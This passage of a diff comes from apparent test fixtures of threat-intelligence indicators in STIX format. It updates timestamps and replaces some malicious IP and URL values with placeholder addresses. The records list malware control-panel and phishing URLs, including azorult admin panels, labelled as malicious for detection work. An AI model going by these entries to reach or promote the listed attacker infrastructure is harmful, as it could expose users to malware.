CyberCrime\",\"id\":\"indicator--642f909c-b1e7-4b17-9786-c01371f5da67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-01-28T02:59:23.53Z\",\"name\":\"mal_ip: 88.119.160.89\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '88.119.160.89']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:23.53Z\"}", + "ingested": "2021-12-13T08:38:40.023682Z", + "original": "{\"created\":\"2020-01-28T02:59:23.53Z\",\"description\":\"TS ID: 55263242004; iType: mal_ip; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime\",\"id\":\"indicator--642f909c-b1e7-4b17-9786-c01371f5da67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-01-28T02:59:23.53Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:23.53Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9701,7 +9701,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385952622Z", + "ingested": "2021-12-13T08:38:40.023688200Z", "original": "{\"created\":\"2020-01-28T02:59:26.887Z\",\"description\":\"TS ID: 55263242013; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--b50c1f06-f68e-4842-a1ac-cddef3c2ff05\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-28T02:59:26.887Z\",\"name\":\"mal_url: http://ld7cad07.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ld7cad07.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:26.887Z\"}", "category": "threat", "type": "indicator", @@ -9720,7 +9720,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 162.219.248.137", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55263241837; iType: mal_ip; State: active; Org: IHNetworks, LLC; Source: CyberCrime", "modified": "2020-01-28T02:59:27.047Z", "valid_from": "2020-01-28T02:59:27.047Z", @@ -9742,12 +9742,12 @@ "first_seen": "2020-01-28T02:59:27.047Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "162.219.248.137" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385957361Z", - "original": "{\"created\":\"2020-01-28T02:59:27.047Z\",\"description\":\"TS ID: 55263241837; iType: mal_ip; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--ab7dae9a-3218-40dd-984c-a928336e1ccb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-38\"],\"modified\":\"2020-01-28T02:59:27.047Z\",\"name\":\"mal_ip: 162.219.248.137\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '162.219.248.137']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:27.047Z\"}", + "ingested": "2021-12-13T08:38:40.023694400Z", + "original": "{\"created\":\"2020-01-28T02:59:27.047Z\",\"description\":\"TS ID: 55263241837; iType: mal_ip; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--ab7dae9a-3218-40dd-984c-a928336e1ccb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-38\"],\"modified\":\"2020-01-28T02:59:27.047Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:27.047Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9765,7 +9765,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php", + "name": "mal_url: http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php", "description": "TS ID: 55263242041; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-01-28T02:59:34.735Z", "valid_from": "2020-01-28T02:59:34.735Z", @@ -9790,16 +9790,16 @@ "url": { "path": "/emmy/PvqDq929BSx_A_D_M1n_a.php", "extension": "php", - "original": "http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php", + "original": "http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php", "scheme": "http", - "domain": "192.210.238.10", - "full": "http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php" + "domain": "192.168.238.10", + "full": "http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385961740Z", - "original": "{\"created\":\"2020-01-28T02:59:34.735Z\",\"description\":\"TS ID: 55263242041; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--fc149a8c-3d46-47f7-b0c2-9764d7291336\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-29\"],\"modified\":\"2020-01-28T02:59:34.735Z\",\"name\":\"mal_url: http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:34.735Z\"}", + "ingested": "2021-12-13T08:38:40.023701600Z", + "original": "{\"created\":\"2020-01-28T02:59:34.735Z\",\"description\":\"TS ID: 55263242041; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--fc149a8c-3d46-47f7-b0c2-9764d7291336\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-29\"],\"modified\":\"2020-01-28T02:59:34.735Z\",\"name\":\"mal_url: http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:34.735Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9850,7 +9850,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385966358Z", + "ingested": "2021-12-13T08:38:40.023708800Z", "original": "{\"created\":\"2020-01-28T02:59:34.772Z\",\"description\":\"TS ID: 55263241981; iType: mal_url; State: active; Org: Hostgator Asian Operations Division.; Source: CyberCrime\",\"id\":\"indicator--167c21ca-7d6b-455c-954a-91a5f036616d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-28T02:59:34.772Z\",\"name\":\"mal_url: http://aivazidis.gq/mad-ooo/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aivazidis.gq/mad-ooo/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:34.772Z\"}", "category": "threat", "type": "indicator", @@ -9902,7 +9902,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385970947Z", + "ingested": "2021-12-13T08:38:40.023716Z", "original": "{\"created\":\"2020-01-28T02:59:39.12Z\",\"description\":\"TS ID: 55263241978; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--8a35f477-32b2-4735-9e85-743115f1e83f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:59:39.12Z\",\"name\":\"mal_url: http://samaaj.org.pk/Elvis/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/Elvis/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:39.12Z\"}", "category": "threat", "type": "indicator", @@ -9953,7 +9953,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385975766Z", + "ingested": "2021-12-13T08:38:40.023723100Z", "original": "{\"created\":\"2020-01-28T02:59:54.142Z\",\"description\":\"TS ID: 55263242015; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--efcb1909-e772-4001-a96c-97c293baa98d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-28T02:59:54.142Z\",\"name\":\"mal_url: http://l3b57852.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l3b57852.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.142Z\"}", "category": "threat", "type": "indicator", @@ -10005,7 +10005,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385980084Z", + "ingested": "2021-12-13T08:38:40.023729100Z", "original": "{\"created\":\"2020-01-28T02:59:54.166Z\",\"description\":\"TS ID: 55263241966; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--b5c97605-a434-4b73-a655-acc88db57cb7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:59:54.166Z\",\"name\":\"mal_url: http://samaaj.org.pk/fk/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/fk/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.166Z\"}", "category": "threat", "type": "indicator", @@ -10024,7 +10024,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php", + "name": "mal_url: http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php", "description": "TS ID: 55263241841; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-01-28T02:59:54.193Z", "valid_from": "2020-01-28T02:59:54.193Z", @@ -10049,16 +10049,16 @@ "url": { "path": "/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php", "extension": "php", - "original": "http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php", + "original": "http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php", "scheme": "http", - "domain": "217.8.117.29", - "full": "http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385984482Z", - "original": "{\"created\":\"2020-01-28T02:59:54.193Z\",\"description\":\"TS ID: 55263241841; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--10690da4-ed16-4fac-bae7-25a1b17db17d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-01-28T02:59:54.193Z\",\"name\":\"mal_url: http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.193Z\"}", + "ingested": "2021-12-13T08:38:40.023735200Z", + "original": "{\"created\":\"2020-01-28T02:59:54.193Z\",\"description\":\"TS ID: 55263241841; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--10690da4-ed16-4fac-bae7-25a1b17db17d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-01-28T02:59:54.193Z\",\"name\":\"mal_url: http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.193Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10076,7 +10076,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 82.118.22.36", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55263241840; iType: mal_ip; State: active; Org: Uaservers Network; Source: CyberCrime", "modified": "2020-01-28T02:59:54.253Z", "valid_from": "2020-01-28T02:59:54.253Z", @@ -10098,12 +10098,12 @@ "first_seen": "2020-01-28T02:59:54.253Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "82.118.22.36" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385988740Z", - "original": "{\"created\":\"2020-01-28T02:59:54.253Z\",\"description\":\"TS ID: 55263241840; iType: mal_ip; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--dff78d62-6939-4d47-a5b3-0c275a472f7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-28T02:59:54.253Z\",\"name\":\"mal_ip: 82.118.22.36\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '82.118.22.36']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.253Z\"}", + "ingested": "2021-12-13T08:38:40.023742500Z", + "original": "{\"created\":\"2020-01-28T02:59:54.253Z\",\"description\":\"TS ID: 55263241840; iType: mal_ip; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--dff78d62-6939-4d47-a5b3-0c275a472f7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-28T02:59:54.253Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.253Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10154,7 +10154,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385992888Z", + "ingested": "2021-12-13T08:38:40.023749500Z", "original": "{\"created\":\"2020-01-28T03:00:08.397Z\",\"description\":\"TS ID: 55263242037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--c1f7d2e7-4186-47c6-a29b-cdb9bb524732\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-28T03:00:08.397Z\",\"name\":\"mal_url: http://j1034033.myjino.ru/laskovo/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1034033.myjino.ru/laskovo/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:08.397Z\"}", "category": "threat", "type": "indicator", @@ -10173,7 +10173,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://85.204.74.152/xcool!/admin.php", + "name": "mal_url: http://89.160.20.156/xcool!/admin.php", "description": "TS ID: 55263241846; iType: mal_url; State: active; Org: UAB Cherry Servers; Source: CyberCrime", "modified": "2020-01-28T03:00:08.446Z", "valid_from": "2020-01-28T03:00:08.446Z", @@ -10198,16 +10198,16 @@ "url": { "path": "/xcool!/admin.php", "extension": "php", - "original": "http://85.204.74.152/xcool!/admin.php", + "original": "http://89.160.20.156/xcool!/admin.php", "scheme": "http", - "domain": "85.204.74.152", - "full": "http://85.204.74.152/xcool!/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/xcool!/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385997276Z", - "original": "{\"created\":\"2020-01-28T03:00:08.446Z\",\"description\":\"TS ID: 55263241846; iType: mal_url; State: active; Org: UAB Cherry Servers; Source: CyberCrime\",\"id\":\"indicator--2ffd18da-452a-462b-a264-4c457564de62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-28T03:00:08.446Z\",\"name\":\"mal_url: http://85.204.74.152/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://85.204.74.152/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:08.446Z\"}", + "ingested": "2021-12-13T08:38:40.023756700Z", + "original": "{\"created\":\"2020-01-28T03:00:08.446Z\",\"description\":\"TS ID: 55263241846; iType: mal_url; State: active; Org: UAB Cherry Servers; Source: CyberCrime\",\"id\":\"indicator--2ffd18da-452a-462b-a264-4c457564de62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-28T03:00:08.446Z\",\"name\":\"mal_url: http://89.160.20.156/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:08.446Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10258,7 +10258,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386001835Z", + "ingested": "2021-12-13T08:38:40.023763900Z", "original": "{\"created\":\"2020-01-28T03:00:22.832Z\",\"description\":\"TS ID: 55263242001; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--bdb1bbc0-4cfe-484b-8c99-22ff164e345d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T03:00:22.832Z\",\"name\":\"mal_url: http://samaaj.org.pk/ejima/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/ejima/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:22.832Z\"}", "category": "threat", "type": "indicator", @@ -10310,7 +10310,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386006253Z", + "ingested": "2021-12-13T08:38:40.023771200Z", "original": "{\"created\":\"2020-01-28T03:00:23.929Z\",\"description\":\"TS ID: 55263241843; iType: mal_url; State: active; Org: Saginaw Valley State University; Source: CyberCrime\",\"id\":\"indicator--b708bbd4-d0f4-406e-926e-086fd1bd096e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-28T03:00:23.929Z\",\"name\":\"mal_url: http://155.138.222.174/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://155.138.222.174/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:23.929Z\"}", "category": "threat", "type": "indicator", @@ -10362,7 +10362,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386010651Z", + "ingested": "2021-12-13T08:38:40.023775300Z", "original": "{\"created\":\"2020-01-28T03:00:30.838Z\",\"description\":\"TS ID: 55263241974; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--384ff3f4-d643-4b23-ad90-9b4fa7524db8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T03:00:30.838Z\",\"name\":\"mal_url: http://samaaj.org.pk/emp/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/emp/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:30.838Z\"}", "category": "threat", "type": "indicator", @@ -10413,7 +10413,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386015210Z", + "ingested": "2021-12-13T08:38:40.023780600Z", "original": "{\"created\":\"2020-01-28T03:00:52.335Z\",\"description\":\"TS ID: 55263242016; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--b5e5a709-1001-4905-9019-d69e53b8393d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-28T03:00:52.335Z\",\"name\":\"mal_url: http://minecraft-only.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://minecraft-only.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:52.335Z\"}", "category": "threat", "type": "indicator", @@ -10465,7 +10465,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386019668Z", + "ingested": "2021-12-13T08:38:40.023786200Z", "original": "{\"created\":\"2020-01-28T03:01:04.475Z\",\"description\":\"TS ID: 55263242040; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--910b12d0-b553-4219-846e-824ea3be86f8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-28T03:01:04.475Z\",\"name\":\"mal_url: http://buythebest.pw/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://buythebest.pw/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:01:04.475Z\"}", "category": "threat", "type": "indicator", @@ -10517,7 +10517,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386023986Z", + "ingested": "2021-12-13T08:38:40.023790500Z", "original": "{\"created\":\"2020-01-28T03:01:04.538Z\",\"description\":\"TS ID: 55263242010; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--6e7ba339-ede0-47fd-a6c9-bd1ffb61fbbf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-28T03:01:04.538Z\",\"name\":\"mal_url: http://smtress.zzz.com.ua/admin/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://smtress.zzz.com.ua/admin/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:01:04.538Z\"}", "category": "threat", "type": "indicator", @@ -10569,7 +10569,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386028244Z", + "ingested": "2021-12-13T08:38:40.023794500Z", "original": "{\"created\":\"2020-01-28T03:01:31.533Z\",\"description\":\"TS ID: 55263241845; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--1d0c2a7c-ba78-4e9f-ae7a-4ce2988357b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-28T03:01:31.533Z\",\"name\":\"mal_url: http://149.28.199.128/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://149.28.199.128/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:01:31.533Z\"}", "category": "threat", "type": "indicator", @@ -10621,7 +10621,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386033033Z", + "ingested": "2021-12-13T08:38:40.023799700Z", "original": "{\"created\":\"2020-01-29T02:59:29.937Z\",\"description\":\"TS ID: 55266539002; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--b78ae5fd-ee1e-49ab-9519-fb62ba1bb26a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T02:59:29.937Z\",\"name\":\"mal_url: http://ecoorganic.co/Work6/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work6/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T02:59:29.937Z\"}", "category": "threat", "type": "indicator", @@ -10673,7 +10673,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386037512Z", + "ingested": "2021-12-13T08:38:40.023805Z", "original": "{\"created\":\"2020-01-29T03:00:21.905Z\",\"description\":\"TS ID: 55266539006; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ec4322a7-481b-4787-8df2-e3b3bc0c8b8b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:00:21.905Z\",\"name\":\"mal_url: http://ecoorganic.co/Work2/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work2/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:21.905Z\"}", "category": "threat", "type": "indicator", @@ -10725,7 +10725,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386041780Z", + "ingested": "2021-12-13T08:38:40.023809300Z", "original": "{\"created\":\"2020-01-29T03:00:29.782Z\",\"description\":\"TS ID: 55266539008; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--cc172be8-7e67-489c-8bd8-8e9ffc11a944\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-29T03:00:29.782Z\",\"name\":\"mal_url: http://aikchimhin.com/walterXXXX/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aikchimhin.com/walterXXXX/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:29.782Z\"}", "category": "threat", "type": "indicator", @@ -10776,7 +10776,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386046048Z", + "ingested": "2021-12-13T08:38:40.023813800Z", "original": "{\"created\":\"2020-01-29T03:00:38.132Z\",\"description\":\"TS ID: 55266538988; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6cb1c4c4-93cb-4ad9-b176-e2a47febafac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-29T03:00:38.132Z\",\"name\":\"mal_url: http://ssgcvb3435fsdgdfg5656sdfgsdfsdf.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ssgcvb3435fsdgdfg5656sdfgsdfsdf.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:38.132Z\"}", "category": "threat", "type": "indicator", @@ -10828,7 +10828,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386050296Z", + "ingested": "2021-12-13T08:38:40.023817400Z", "original": "{\"created\":\"2020-01-29T03:00:38.721Z\",\"description\":\"TS ID: 55266538999; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--42f95e09-bad2-4055-bf72-fd3d1f26a173\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:00:38.721Z\",\"name\":\"mal_url: http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 